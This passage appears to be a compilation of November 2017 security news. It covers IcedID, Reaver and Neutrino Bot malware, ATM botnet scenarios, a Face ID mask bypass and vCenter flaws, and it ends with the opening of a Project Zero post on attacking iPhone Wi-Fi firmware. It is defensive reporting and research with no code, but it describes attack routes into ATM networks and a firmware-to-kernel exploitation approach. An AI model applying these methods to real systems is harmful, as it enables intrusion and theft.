“Overall, this is similar to other banking Trojans, but that’s also where I see the problem,” says Limor Kessem, executive security advisor for IBM Security.

The banking Trojan was first observed in September in campaigns aimed at banks, payment card providers, mobile service providers, payroll, Webmail, and e-commerce sites in the United States and Canada.

The malware also targeted two major banks in the United Kingdom.

The experts highlighted the distribution technique adopted by IcedID that leverages on the Emotet Trojan. Emotet is delivered via spam emails, usually disguised in productivity files containing malicious macros, and remains stealth to be used by operators to distribute other payloads, such as IcedID.

IcedID implements the ability to propagate over a network, a circumstance that suggests authors developed it to target large businesses.

“IcedID can propagate over a network. It monitors the victim’s online activity by setting up a local proxy for traffic tunneling, which is a concept reminiscent of the GootKit Trojan. Its attack tactics include both webinjection attacks and sophisticated redirection attacks similar to the scheme used by Dridex and TrickBot.” reads the analysis published by IBM.

The redirection scheme implemented by IcedID is designed to appear as seamless as possible to the victim. It includes displaying the legitimate bank’s URL in the address bar and the bank’s correct SSL certificate by keeping a live connection with the actual bank’s site.

The malware listens for the target URL and when it encounters a trigger, executes a Web injection. Victims are redirected to fake banking websites, used by crooks to trick victims into submitting their credentials.


The attacker controls the victim’s session and uses social engineering to trick victims into sharing transaction authorization data.

The level of sophistication of the IcedID malware suggests the attackers belong to a well-structured group. The analysis of comments in IcedID code indicates the attackers are from Russian-speaking regions.

Experts believe the threat could evolve in the next future, for example by implementing advanced anti-virtual machine or anti-research techniques along with techniques to evade sandboxes.

Further technical details on the malware, including the Indicators of Compromise, are available in the blog post published by IBM.

Microsoft Uses Neural Networks to Improve Fuzzing
14.11.2017 securityweek IT
A team of Microsoft researchers has been working on improving fuzzing techniques by using deep neural networks, and initial tests have shown promising results.

Fuzzing is used to find software vulnerabilities – particularly memory corruption bugs – by injecting malformed or semi-malformed data into the targeted application. If the software crashes or behaves unexpectedly, it could indicate the presence of a security flaw.

There are three types of fuzzing: whitebox fuzzing, which tests source or disassembled code; blackbox fuzzing, which does not require access to source code; and greybox fuzzing, which is similar to blackbox fuzzing but uses results from previous executions for feedback.

Experts at Microsoft have attempted to improve this feedback loop using a type of machine learning called deep neural networks (DNN). Neural networks, a set of algorithms modeled after the human brain, are designed to recognize patterns in an effort to help classify and cluster data.

Neural networks have been used by several companies for security-related purposes, including for detecting spam and malware, and even in Apple’s new Face ID feature.

Microsoft researchers have been trying to use neural networks for a learning technique that relies on patterns in previous fuzzing iterations to guide future iterations.

“The neural models learn a function to predict good (and bad) locations in input files to perform fuzzing mutations based on the past mutations and corresponding code coverage information,” the researchers said.

The method has been implemented in American Fuzzy Lop (AFL), a popular open source fuzzer developed by Google researcher Michal Zalewski. Tests were conducted against parsers for the ELF, PDF, PNG and XML file formats.

The tests showed significant improvements in the results obtained with the neural AFL compared to the original AFL, except for PDF files, which experts believe may be too large. Improvements were seen in terms of code coverage, unique code paths and crashes.

The team behind the project believes this approach can be applied to any fuzzer, not just AFL.

“We believe our neural fuzzing research project is just scratching the surface of what can be achieved using deep neural networks for fuzzing,” explained Microsoft’s William Blum. “Right now, our model only learns fuzzing locations, but we could also use it to learn other fuzzing parameters such as the type of mutation or strategy to apply. We are also considering online versions of our machine learning model, in which the fuzzer constantly learns from ongoing fuzzing iterations.”

Blum is the lead of the engineering team for Microsoft Security Risk Detection, a recently launched cloud-based fuzzing service that uses artificial intelligence to find bugs and vulnerabilities in applications. The results of the research into the use of neural networks for fuzzing could help improve this service.

Another recently launched Microsoft tool designed for finding memory corruption bugs, VulnScan, might also be added to the Security Risk Detection service.

Financial Services Has Most Code Vulnerabilities of All Industries: Analysis
14.11.2017 securityweek
Last week, the Securities Industry and Financial Markets Association (SIFMA) ran Quantum Dawn IV to test the resiliency and response of the financial services industry to a major cyber incident. Today, a new CAST report on application security health (CRASH) highlights that finance has some of the worst code -- in security terms -- of all the major industry sectors.

The details come from the CAST Software CRASH Report on Application Security (PDF). CAST analyzed 278 million lines of code from 1,388 applications and found 1.3 million CWE (MITRE's Common Weakness Enumeration) weaknesses in code developed under .NET and Java EE. The implication is that the banking sector will need to take considerable care in the implementation of Europe's open banking regulation (PSD2) due to come into force in January 2018. It will need to ensure that third-parties do not implement insecure code with access to banking code that already has a higher than average density of its own coding flaws.

CAST specifically analyzed code developed across ten different industry sectors within .NET and Java EE environments. It found a significantly different density of CWEs between the two environments, with .NET code generally having a greater density of weaknesses than Java EE -- in some cases with more than 35 CWE weaknesses per KLOC (1000 lines of code). A CWE is a coding weakness that could potentially be exploited by an attacker -- such as a buffer overflow flaw, or a SQLi or cross-site scripting flaw.

Financial services, Telecom and IT Consulting had the highest mean CWE densities. Energy and Utilities had the lowest CWE densities.

CAST also noted a difference between Waterfall coding and Agile coding -- with agile coding tending to introduce fewer weaknesses.

CAST's chief scientist, Bill Curtis, told SecurityWeek that while the Waterfall approach of defining and designing the entire project upfront is theoretically a good idea, business pressures -- with senior management requiring amendments in progress -- often make its actual implementation less than perfect. This in turn leads to additional work requirements and rushed deadlines introducing additional weaknesses.

In general, there are fewer CWE weaknesses found in Java EE developments that use an agile approach to development; that is, building the project while still in development, adding new features as required by senior management, and releasing new versions as soon as they are ready. This can be taken too far -- a high number releases (more than 6 per year) tends to introduce a higher number of weaknesses. This could be indicative of business seeking new features and rapid releases above secure coding. Security neds to be built into the process rather than added on to the application.

Nevertheless, there is still a surprisingly high density of weaknesses found in all applications across all industry sectors. Curtis would personally recommend a hybrid approach: using a waterfall approach to get the architecture right from the beginning, but an agile approach to delivering code.

He sees the real problem as a lack of discipline in coding that is itself the result of a lack of adequately qualified programmers. The rush to digitizing all aspects of business has placed a severe strain on the available supply of programmers -- schools and colleges simply cannot produce new programmers as fast as necessary. Furthermore, the coders that are provided tend not to have any formal training in 'secure coding'.

The under-supply of programmers has led to the development of the off-shore programming industry -- and especially from India. CAST's analysis shows no real difference in the number of CWEs between on-shore and off-shore coding. However, Curtis told SecurityWeek that the continuing growth of demand has already absorbed the top layer of programmers from the off-shore industry, and less able programmers are beginning to be employed.

He does not, however, believe that the growth in demand will inevitably lead to increasing security weaknesses in the code. Companies will always need to select the best programmers they can find to employ, but now need to provide additional in-house training for secure coding. This approach coupled with automated static code analysis would improve the quality of new applications -- and help strengthen the security of existing applications.

In the meantime, he believes that school education needs to change. At the moment it concentrates on teaching youngsters reading, writing and arithmetic. He believes that basic coding should be given similar emphasis to reading and writing. In the future, schools may need to discuss elegant routines in the same way as they currently discuss Shakespearean metaphors.

ThreatQuotient Raises $30 Million in Series C Funding
14.11.2017 securityweek IT
Threat intelligence platform provider ThreatQuotient announced on Monday that it has raised $30 million in Series C funding, bringing the total amount raised by the company to $54 million to date.

Founded in 2013 by Wayne Chiang and Ryan Trost, who previously worked at a Security Operations Center of defense contractor General Dynamics, ThreatQuotient offers a threat intelligence platform that helps customers manage and correlate external sources with all internal analytics solutions for contextual, operationalized intelligence.

According to the Reston, Virginia-based company, the funding will be used to fuel product development and support sales and marketing efforts for global expansion.

The company’s ThreatQ platform allows security analysts to leverage a threat library, an adaptive workbench, and an open API exchange to provide threat intelligence that is timely, accurate and relevant to their business.

ThreatQuotient claims that its platform eliminates the need for a security analyst to go through an entire pool of data to identify a threat by automating the process and suggesting sources of data that are more relevant to a given client.

“Our industry is at a crossroads and organizations must shift beyond simple detection and response to a position of understanding and anticipating threats through intelligence-driven security,” said John Czupak, President and CEO of ThreatQuotient.

The Series C round was led by Adams Street Partners, while strategic partners Cisco Investments and NTT DOCOMO Ventures joined existing investor New Enterprise Associates (NEA), and growth capital partner Silicon Valley Bank in the financing.

Fred Wang, a partner of the Venture/Growth Team at Adams Street Partners, will join ThreatQuotient's board of directors.

iPhone X's Face ID Bypassed by a Mask
13.11.2017 securityweek Apple
Face ID, the facial biometric unlocking technology included in Apple’s recently laucnhed iPhone X, can be bypassed using a mask, security researchers have discovered.

When revealing the new iPhone X in early September, Apple said that Face ID could recognize its owner with only 1 in 1,000,000 false positives, day or night, and that professional mask makers and makeup artists in Hollywood helped training the artificial intelligence behind the feature to protect from attempts to bypass it.

The feature, however, raised concerns over the use of facial recognition becoming the norm and opening the door to new ways to abuse it. Some even feared that it would result in advertisers and law enforcement being able to track people’s whereabouts much easier.

Simultaneously, many questioned Face ID’s effectiveness against keeping intruders out of the device. And while some previous attempts to trick the security feature appear to have failed, Face ID was successfully bypassed by a mask created by Bkav, a company focused on the network security, software, smartphone manufacturing and smarthome.

“One week after iPhone X officially went on sale, Bkav security experts from Vietnam show that Face ID can be fooled by mask, which means it is not an effective security measure,” the company says.

The mask used by the researchers in their experiment included 3D-printed elements, a nose made by a handmade artist, and 2D printed-elements for some parts. Hand-made skin was also used to trick Apple’s AI. The total cost to produce the mask was $150, the researchers say.

“The mask is crafted by combining 3D printing with makeup and 2D images, besides some special processing on the cheeks and around the face, where there are large skin areas, to fool AI of Face ID,” Ngo Tuan Anh, Bkav's Vice President of Cyber Security, said.

The security researchers claim that the purpose of their experiment was to show that facial recognition isn’t mature enough to be used in widely available devices even after 10 years of development. In 2008, Bkav demonstrated that face recognition was not an effective security measure for laptops, after manufacturers started using the technology in their products.

Although they say it’s actually easy to create a mask and beat Face ID, the researchers admit that their knowledge of how Apple’s AI works and what they could do to bypass it helped them in creating a proof of concept. The researchers claim that Apple appears to rely on the Face ID’s AI too much for the recognition process, which allows one to unlock the device even with half of their face covered.

“Potential targets shall not be regular users, but billionaires, leaders of major corporations, nation leaders and agents like FBI need to understand the Face ID's issue. Security units' competitors, commercial rivals of corporations, and even nations might benefit from our PoC,” Bkav says.

The researchers note that the mask was an experiment meant to prove a point, and that it was a successful experiment. They also revealed that they started working on the mask as soon as they received their iPhone X device on November 5 and that they plan on publishing full details related to how they built the mask.

“As for biometric security, fingerprint is the best,” the company concludes.

Until full details on the experiment are published, some questions remain unanswered, such as whether they used the dimensions of a real person’s face when creating the mask or if the attack was attempted with a fresh unlock.

Further details on how the experiment was set up are also required, such as whether the device was trained with the mask or not, and the number of attempts they used until successfully unlocking the phone.

SecurityWeek reached to Apple for a comment on Bkav’s findings, but the company redirected us to their Knowledge Base article on Face ID, where the additional security measures are detailed. There, Apple explains that setting up Face ID requires a passcode and that the passcode is requested after five unsuccessful attempts to match a face or if the device hasn’t been unlocked for more than 48 hours.

The passcode is also requested if it “hasn’t been used to unlock the device in the last six and a half days and Face ID hasn't unlocked the device in the last 4 hours,” Apple says.

Google to Ban Android Apps Misusing Accessibility Service
13.11.2017 securityweek Android
Following an increase in Android malware and adware that abuse accessibility services, Google has decided to take action against all apps that misuse the feature.

Much of the adware and malware that makes it onto the Google Play store abuses the BIND_ACCESSIBILITY_SERVICE permission. The permission is designed to allow apps to assist users with disabilities, but malware developers have found ways to misuse it in order to obtain device administrator privileges and conduct other malicious activities without raising suspicion.

One example is TOASTAMIGO, a piece of malware that exploits a recently patched vulnerability affecting the Toast feature in Android.

In an effort to prevent abuse, Google has decided that accessibility services should only be used to help people with disabilities. The tech giant has started contacting developers whose applications use the BIND_ACCESSIBILITY_SERVICE permission and informed them of the steps they need to take.

Developers who use the aforementioned permission to help people with disabilities must clearly state this in the app’s description on Google Play, and they must describe the functionality provided by the Accessibility Service permission. All other developers will have to remove the permission from their products within 30 days or risk having it pulled from the official app store.

“Alternatively, you can choose to unpublish the app,” Google told developers. “All violations are tracked. Serious or repeated violations of any nature will result in the termination of your developer account, and investigation and possible termination of related Google accounts.”

Many users and developers have raised concerns regarding Google’s decision, pointing out that legitimate apps often use the Accessibility Service as a workaround for features that otherwise might be difficult or impossible to implement.

Popular applications such as the LastPass password manager are set to lose important functionality if Google moves forward with its decision. There is also a lot of concern regarding the automation app Tasker, which is not specifically designed for individuals with disabilities, but which appears to be of great aid to some people with Parkinson's disease and Asperger syndrome.

Some have offered advice on how app developers may be able to bypass the new restrictions, and shared thoughts on what alternative routes Google could take to prevent abuse while allowing legitimate apps to continue using the service.

Creating ATM Botnets Not Difficult, Researchers Say
13.11.2017 securityweek BotNet
ATMs Are Not Immune to Supply Chain Attacks and Other Digital Threats

Internet-connected Automated teller machines (ATMs) can be discovered using dedicated search engines and specific keywords and then ensnared into botnets, Kaspersky Lab researchers believe.

With large sums of cash being loaded into ATMs on a daily basis, it’s no wonder that these devices are targeted by cybercriminals. And while some crooks take a blunt approach to getting into an ATM, using physical force, others prefer targeting the software running on the machine to make it spill out the cash, Kaspersky’s Olga Kochetova and Alexey Osipov explained at the DefCamp 2017 security conference in Bucharest last week.

There's no denying that ATMs run vulnerable software, they say. Many of the machines run the outdated, already retired Windows XP, meaning they are vulnerable by default, while others might have some unnecessary but flawed applications running on them, such as TeamViewer or an older, flawed variant of Adobe Acrobat Reader.

What’s more, banks often do not keep their ATMs updated, which also makes them vulnerable to malware and other types of attacks, the researchers say. The security inside the ATM is usually poor and the parts of the chain protecting the cash aren’t secured separately, meaning that the entire chain ca be compromised when a single part is exploited.

Accessing the software running on an ATM provides malicious actors with control over the cash cassettes inside the machine, thus allowing them to extract the cash. However, access to a single machine could also provide the actor with the ability to compromise the bank’s entire network of ATMs, Kaspersky’s researchers say.

There are multiple ways in which an attacker could achieve this, Kochetova and Osipov told SecurityWeek during a private talk at the DefCamp conference: by physically accessing an ATM to install a device in it, by compromising the computers that oversee the bank’s ATMs, and even by a supply-chain attack that focuses on the firmware that vendors or maintenance teams install on the machines.

“With access to an ATM, an actor could install a device in one ATM to send commands to all machines in the network. These commands would look like they come from the central command center. The actor can then use blank cards, or any cards, and withdraw cash from any ATM in the network,” the researchers explained.

This is possible because all of a bank’s ATMs are typically connected to a flat network, which means that every machine in the network could see all other connected machines. Thus, if the attacker’s device is implanted in an ATM directly connected to the network cable, it could allow an attacker to remotely control the machines. It is a classic example of man-in-the-middle attack (MitM), the researchers say.

They also pointed out that all evidence would disappear once the malicious device has been extracted from the ATM. Although a possibility, no such botnet has been observed to date. What has been seen, however, was a bank’s network being infected with an information stealer.

“This can be seen as a kind of an ATM botnet, since all machines were infected and the actor was remotely collecting data from them,” Kochetova said. “It is also possible that some crooks somewhere in the world are preparing an attack with money-withdrawal malware instead of sniffers,” she continued.

Attackers could also get the VPN drive out of the ATM and connect to the bank’s network through it without anyone noticing, Osipov explains. Such VPN devices are designed to work regardless of the host machine, so the attacker could use it with their own computer.

One other effective method of infiltrating ATM networks is to discover the machines that are online using specialized search engines such as Shodan, the researchers say. Although banks usually claim that no ATM is online, these devices can be easily found if the right keywords or phrases are used to perform the search, Kochetova and Osipov explained.

While the attack vector has been used before (specialized search engines can be used to discover vulnerable Internet of Things (IoT) devices, unsecured databases, and other types of Internet-facing devices), it is relatively new when it comes to finding ATMs.

Once they have discovered the online ATMs, the malicious actor can start checking for open ports and then attempt to compromise machines using known exploits. Thus, attackers could install information-stealing malware on the ATMs or ensnare them into botnets.

Infecting workstations inside the bank and then expanding the footprint to the entire network, including ATMs, is another compromise technique that attackers (such as the Cobalt hacking group) are using.

Recent attacks such as CCleaner and NotPetya have demonstrated the impact supply-chain attacks could have on a global scale, and Kaspersky’s researchers say that ATMs aren’t safe from this type of assaults either. To be successful, the attacker would target the “golden image” used to install the operating system and all running software on an ATM.

“We already observed incidents where ordinary malware ended up on an ATM through an infected USB drive that a technician connected to the machine. Thus, if an infected ‘golden image’ is used, the technician would never even notice the compromise. Of course, the attacker would have to know what specific software to install on that ‘golden image’ to compromise the ATMs without being noticed,” Osipov said.

“The same would happen if a service provider is used as a vector of attack. No one would notice the compromise,” he also said.

An ATM botnet could also be used to mine crypto-currency. Crypto miners have become highly popular over the past few years and an increasing number of malicious attacks focused on deploying such software was observed this year. Because they have computing power, ATMs can be used for mining too.

“In the end, every ATM is yet another type of computer. This means it can be hacked if the right vulnerabilities are discovered,” Kochetova pointed out. “It is the same as with CCTV cameras that are infected to create IoT botnets,” she concluded.

VMware Patches Vulnerabilities in vCenter Server
13.11.2017 securityweek
The VMware vCenter Server management software is affected by a couple of moderate severity vulnerabilities that can be exploited for obtaining information and remote denial-of-service (DoS) attacks.

The first flaw, tracked as CVE-2017-4927, is related to how vCenter Server handles specially crafted LDAP network packets. An attacker can exploit the vulnerability remotely to cause a DoS condition.

The vulnerability was discovered by a Fortinet researcher in January, but it was only confirmed in April and patched some months later. Fortinet has published its own advisory for the security hole and assigned it a risk rating of 3/5.

The issue affects vCenter Server 6.0 and 6.5 on any platform and it has been addressed with the release of versions 6.0 U3c and 6.5 U1.

The second vulnerability, CVE-2017-4928, affects the Flash-based vSphere Web Client; VMware pointed out that the HTML5-based application is not affected.

This CVE identifier has actually been assigned to two weaknesses discovered by a Tencent researcher in the product: a server-side request forgery (SSRF) issue and a CRLF injection bug.

“An attacker may exploit these issues by sending a POST request with modified headers towards internal services leading to information disclosure,” VMware said in its advisory.

vCenter Server 5.5 and 6.0 are affected, and patches are included in versions 5.5 U3f and 6.0 U3c.

VMware’s disclosure of the vulnerabilities coincides with the release of vCenter Server 6.0 U3c. The other versions that include patches for these security holes, 5.5 U3f and 6.5 U1, were made available in mid-September and late July, respectively.

Version 6.5 U1 also patched a moderate severity stored cross-site scripting (XSS) vulnerability in the vCenter Server H5 Client. The flaw can be exploited by an authenticated attacker to execute malicious JavaScript code in the targeted user’s context.

vCenter Server versions 5.5, 6.0 and 6.5 are also affected by a bug that allows an attacker with limited user privileges to abuse an API in order to access the guest operating system without authentication. The flaw was disclosed in late July at the Black Hat security conference in Las Vegas, but VMware has only released workarounds for it.

Bug bounty programs and a vulnerability disclosure policy allowed Pentagon fix thousands of flaws
13.11.2017 securityaffairs BigBrothers

Bug bounty programs allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.
Bug bounty program ‘Hack the Pentagon’ launched by the Pentagon in 2016 along with the vulnerability disclosure policy announced nearly one year ago allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.

“Great news for U.S. citizens! Over 3,000 valid security vulnerabilities have been resolved with the U.S. Department of Defense’s “Hack the Pentagon” hacker-powered security program.” reported the platform used by the US Government to manage the initiatives.

“Just over a year ago, following the success of the pilot, we announced the U.S. Department of Defense was expanding its “Hack the Pentagon,” initiatives. To date, HackerOne and DoD have run bug bounty challenges for Hack the Pentagon, Hack the Army and Hack the Air Force.

The success of the bug bounty programs launched by the UG Government has been undeniable.

The hackers have earned over $300,000 in bounties for their contributions, they reported nearly 500 vulnerabilities in nearly 40 DoD components, more than 100 of the flaws have been rated critical or high severity.

Let me also remind you that the DoD vulnerability disclosure program does not offer any monetary rewards, instead it allows hackers to report security holes without the fear of potential legal consequences.

The list of vulnerabilities includes remote code execution, SQL injection, and authentication bypass issues.

Bug bounty Hack the Pentagon

The majority of the reports were submitted by US researchers, followed by white hat hackers in India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

Going through the various bug bounty initiatives launched by the US Government, we can notice that the Hack the Pentagon received 138 valid submissions and paid out roughly $75,000, the Hack the Army paid out approximately $100,000 for 118 valid reports, and Hack the Air Force, which paid out $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs were announced by U.S. authorities.

A China-linked cyber espionage group has been using a new strain of malware dubbed Reaver
13.11.2017 securityaffairs CyberSpy

Experts at Palo Alto Networks have discovered a new malware family named Reaver with ties to hackers who use the SunOrcal malware.
A China-linked cyber espionage group has developed a new strain of malware, dubbed Reaver, that was already observed in highly targeted attacks during 2016.

The malware was analyzed by experts at Palo Alto Networks, who spotted ten different samples belonging to three different versions of the malicious code.

Reaver malware

The Chinese cyberspies deliver the malware Windows Control Panel (CPL) files, a technique not common in the threat landscape, according to Palo Alto Networks only 0.006% of the malware is using this method.

“Unit 42 has discovered a new malware family we’ve named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010.” reads the analysis published by Palo Alto Networks.

“The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.”

The analysis of the infrastructure used by the threat actor behind the Reaver malware revealed a link to the SunOrcal malware used by China-linked attackers in campaigns that targeted the January 2016 presidential election in Taiwan.

The experts haven’t information about the intended targets of the Reaver attackers, previous reports suggest the threat actors primarily targeted the movements the Chinese government perceives as dangerous, so-called Five Poisons.

Five Poisons movements are:

Uyghurs, particularly those supporting East Turkestan independence
Tibetans, particularly those supportive of Tibetan independence
Falun Gong practitioners
Supporters of Taiwan independence
Supporters of Chinese democracy
Starting in late 2016, the attackers used both families of malware concurrently and the same C2 infrastructure was used in the campaigns involving both malicious codes.

Threat actors behind the SunOrcal malware were known for the use of the Surtr RAT, which has been tied to weaponized document generators named HomeKit and Four Element Sword. The hacker group has been around since at least 2013, but further investigation suggests it may have been active since at least 2010.

The Reaver malware abuses the Control Panel utility in Windows, control.exe, to load the final payload. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 leverages a payload that uses raw TCP connections for network communication

Once Reaver infected a device, it first gathers information about the compromised system (CPU speed, computer name, username, IP, memory information and Windows version).

The Reaver malware is able to perform many other malicious activities, including reading and writing files, altering files and registries, and terminating processes, and modifying services.

Technical details about the Reaver malware are included in the report published by Palo Alto Networks, it also includes indicators of compromise (IoC) and details on the C&C infrastructure.

Phony WhatsApp used Unicode to slip under Google’s radar
13.11.2017 Malwarebytes Mobil

Phony WhatsApp used Unicode to slip under Google’s radar
After a troubling week for Google not so long ago, the company is under the spotlight once more for missing another app that, after further investigations by several members of Reddit, was found laden with adware.

This app, which was called “Update WhatsApp Messenger,” used the logo and developer name of the real WhatsApp app—two elements that a user familiar with the app expects to see. However, the developer name for this bogus app had an extra space at the end, so it looked like this:

WhatsApp, Inc.{space}

To aid users in realizing this deception, Redditor Megared17 posted snapshots of a code section belonging to the real WhatsApp and the fake app to compare the two. We have reproduced the shots below for your convenience.

That bit in the box is the percent coding equivalent of a blank space, which translates to U+00A0, the Unicode value of a no-break space. Although this is something our normal eyes may have a difficult time spotting, many decried that Google’s scanner should have quickly picked this up.

Read: Out of character: Homograph attacks explained

Once downloaded and installed, Redditor Dextersgenius pointed out that “Update WhatsApp Messenger” hid from users by “not having a title and having a blank icon,” which he then supplemented with screenshots that we also reproduced below.

From Dextersgenius’s testing, they also pointed to a piece of code that indicated this bogus app appears to access a hardcoded bit.ly shortened URL that presumably downloads an update APK named whatsapp.apk. Upon closer inspection, however, the bit.ly URL led to another shortened URL—this time Google’s URL shortener, goo.gl—that then led to a Google search result for a WhatsApp Messenger APK file.

Essentially, users are told to “Look for the APK file from these search results. It’s got to be in one of them!” No updates are sent to the phones at all, so they’re just left with a PUP app.

“Users need to be more vigilant,” advised Armando Orozco, Lead for the Mobile Protection Team at Malwarebytes. “If they want to update WhatsApp, they need to use the update mechanism in the Play Store app, not a secondary app.”

Apart from reading app reviews for any reports of questionable behavior, it also pays for users to check the link to the developer of the app, which might have helped catch “Update WhatsApp Messenger” and possibly lessen the number of affected devices.

Disdain exploit kit and a side of social engineering deliver Neutrino Bot
13.11.2017 Malwarebytes
Today we picked up new activity from an exploit kit that was first discovered back in August of this year. The Disdain exploit kit, simply identified by a string of the same name found in its source code, is being distributed again after a short interruption via malvertising chains.

Disdain EK relies on older vulnerabilities that have long been patched and some that do not appear to be working properly. From a traffic to infection point of view, this means that the conversion rates are going to be lower than, say, RIG EK, the other most common exploit kit at the moment.

This may explain why we are seeing Disdain being used as a drive-by download alongside a social engineering attack to increase the likelihood of infections. Case in point, the following site was compromised to serve Disdain EK while also distributing a fake Flash Player update:

What’s interesting is that both payloads (Disdain’s malware drop and the so-called Flash update) are actually the same malicious binary, just delivered by different methods. The former is loaded via an iframe injected into the page which triggers the exploit kit and delivers the payload automatically, while the latter is a regular download that requires user interaction to download and run it.

Disdain’s landing page exploits older Internet Explorer vulnerabilities and attempts to load Flash exploits as well, although in our tests these did not work.

That payload is Neutrino Bot, which we have documented on this blog before when it was served in malicious spam campaigns as well as via the now defunct Neutrino exploit kit. Neutrino Bot, AKA Kasidet , is a multi-purpose piece of malware famous for its information stealing abilities.

In the past few weeks, there have been a few developments in the exploit kit scene beyond the long running RIG exploit kit, where threat actors are attempting new tricks both from an evasion and distribution point of view. Despite this, there remains a lack of innovation in what really matters at the end of the day: the exploits being used to deliver drive-by infections.

While some groups have switched to pure social engineering-based attacks, others are attempting either or both methods at once. In the current threat landscape, the campaigns that have the most success are those that can draw a lot of traffic and use clever techniques to fool users.

Systems that have been patched regularly would not be affected by this exploit kit, but at the same time users should beware of non-legitimate software updates. Many of the so-called “Flash Player” or “Video Player” updates typically push adware and, as we saw recently with the BadRabbit outbreak, even ransomware.

Malwarebytes users are protected from the Disdain exploit kit and Neutrino Bot malware.

Over The Air - Vol. 2, Pt. 3: Exploiting The Wi-Fi Stack on Apple Devices
13.11.2017 Google Project Zero  Apple

In this blog post we’ll complete our goal of achieving remote kernel code execution on the iPhone 7, by means of Wi-Fi communication alone.

After developing a Wi-Fi firmware exploit in the previous blog post, we are left with the task of using our newly acquired access to gain control over the XNU kernel. To this end, we’ll begin by investigating the isolation mechanisms present on the iPhone. Next, we’ll explore the ways in which the host interacts with the Wi-Fi chip, identify several attack surfaces, and assess their corresponding security properties. Finally, we’ll discover multiple vulnerabilities and proceed to develop a fully-functional reliable exploit for one of them, allowing us to gain control over the host’s kernel.

All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5, #6, #7) were reported to Apple and subsequently fixed in iOS 11. For an analysis of other affected devices in the Apple ecosystem, see the corresponding security bulletins.
Hardware Isolation

Broadcom’s Wi-Fi chips are present in a wide range of platforms; including mobile phones, IOT devices and Wi-Fi routers. To accommodate for this variance, each chip must be sufficiently configurable, supporting several different interfaces for vendors wishing to integrate the chip into their platform. Indeed, Cypress’s data sheets include a wide range of supported interfaces, including PCIe, SDIO and USB.

While choosing the interface with which to integrate the chip may seem inconsequential, it could have far ranging security implications. Each interface comes with different security guarantees, affecting the degree to which the peripheral may be “isolated” from the host. As we’ve already demonstrated how the Wi-Fi chip’s security can be subverted by remote attackers, it’s clear that providing isolation is crucial in sufficiently safeguarding the host.

From a security perspective, both SDIO and USB (up to 3.1) inherently offer some degree of isolation. SDIO solely enables the serial transfer of information between the host and the target device. Similarly, USB allows the transfer of “packets” between peripherals and the host. Broadly speaking, both interfaces can be thought of as facilitating an explicit communication channel between the host and the peripheral. All the data transported through these interfaces must be explicitly handled by either peer, by inspecting incoming requests and responding accordingly.

PCIe operates using a different paradigm. Instead of communicating with the host using a communication protocol, PCIe allows peripherals to gain Direct Memory Access (DMA) to the host’s memory. Using DMA, peripherals may autonomously prepare data structures within the host’s memory, only signalling the host (via a Message Signalled Interrupt) once there’s processing to be done. Operating in this manner allows the host to conserve computing resources, as opposed to protocols that require processing to transfer data between endpoints or to handle each individual request.

Efficient as this approach may be, it also raises some challenges with regards to isolation. First and foremost, how can we be guaranteed that malicious peripherals won’t abuse this access in order to attack the host? After all, in the presence of full control over the host’s memory, subverting any program running on the host is trivial (for example, peripherals may freely modify a program’s stack, alter function pointers, overwrite code -- all unbeknownst to the host itself).

Luckily, this issue has not gone unaddressed. Sufficient isolation for DMA-capable components can be achieved by partitioning the visible memory space available to the peripheral using a dedicated hardware component - an I/O Memory Management Unit (IOMMU).

IOMMUs facilitate a memory translation service for peripherals, converting their addressable memory ranges (referred to as “IO-Space”) into ranges within the host’s Physical Address Space (PAS). Configuring the IOMMU’s translation tables allows the host to selectively control which portions of its memory are exposed to each peripheral, while safeguarding other ranges against potentially malicious access. Consequently, the bulk of the responsibility for providing sufficient isolation lays with the host.

Returning to the issue at hand, as we are focusing on the Wi-Fi stack present within Apple’s ecosystem, an immediate question springs to mind -- which interfaces does Apple leverage to connect the Wi-Fi chip to the host? Inspecting the Wi-Fi firmware images present in several generations of Apple devices reveals that since the iPhone 6 (included), Apple has opted for PCIe to connect the Wi-Fi chip to the host. Older models, such as the iPhone 5c and 5s, relied on a USB interface instead.

Due to the risks highlighted above, it is crucial that recent iPhones utilise an IOMMU to isolate themselves from potentially malicious PCIe-connected Wi-Fi chips. Indeed, during our previous research into the isolation mechanisms on Android devices, we discovered that no isolation was enforced in two of the most prominent SoCs; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890, thereby allowing the Wi-Fi chip to freely access the host’s memory (leading to complete compromise of the device).
Inspecting the DMA Engine

To gain some visibility into the isolation capabilities present on the iPhone 7, we’ll begin by exploring the Wi-Fi firmware itself. If a form of isolation is present, the memory ranges used by the Wi-Fi SoC to perform DMA operations and those utilised by the host would be disparate. Conversely, if we happen to find the same ranges of physical addresses, that would hint that no isolation is taking place.

Luckily, much of the complexity involved in reverse-engineering the firmware’s DMA functionality can be forgone, as Broadcom’s SoftMAC drivers (brcm80211) contain the majority of the code used to interface with the SoC’s DMA engine.

Each DMA engine facilitates transfers in a single direction between two endpoints; one representing the Wi-Fi firmware, and another denoting either an internal core within the Wi-Fi SoC (such as when interacting with the RX or TX FIFOs) or the host itself. As we are interested in inspecting the memory ranges used for transfers originating in the Wi-Fi chip and terminating at the host, we must locate the DMA engine responsible for “dongle-to-host” memory transfers.

As it happens, this task is rather straightforward. Each “dma_info” structure in the firmware (representing a DMA engine) is prefixed by a pointer to a block of DMA-related function pointers stored in the firmware’s RAM. Since the block is placed at a fixed address, we can locate all instances of the structure by searching for the pointer within the firmware’s RAM. For each instance we come across, inspecting the “name” field encoded in the structure should allow us to deduce the identity of the DMA engine in question.

Combining these two tidbits, we can quickly locate each DMA engine in the firmware’s RAM:

The first few instances clearly relate to internal DMA engines. The last instance, labeled “H2D”, indicates “host-to-dongle” memory transfers. Therefore, by elimination, the single entry left must correspond to transfers from the dongle to the host (sneakily left unnamed!).

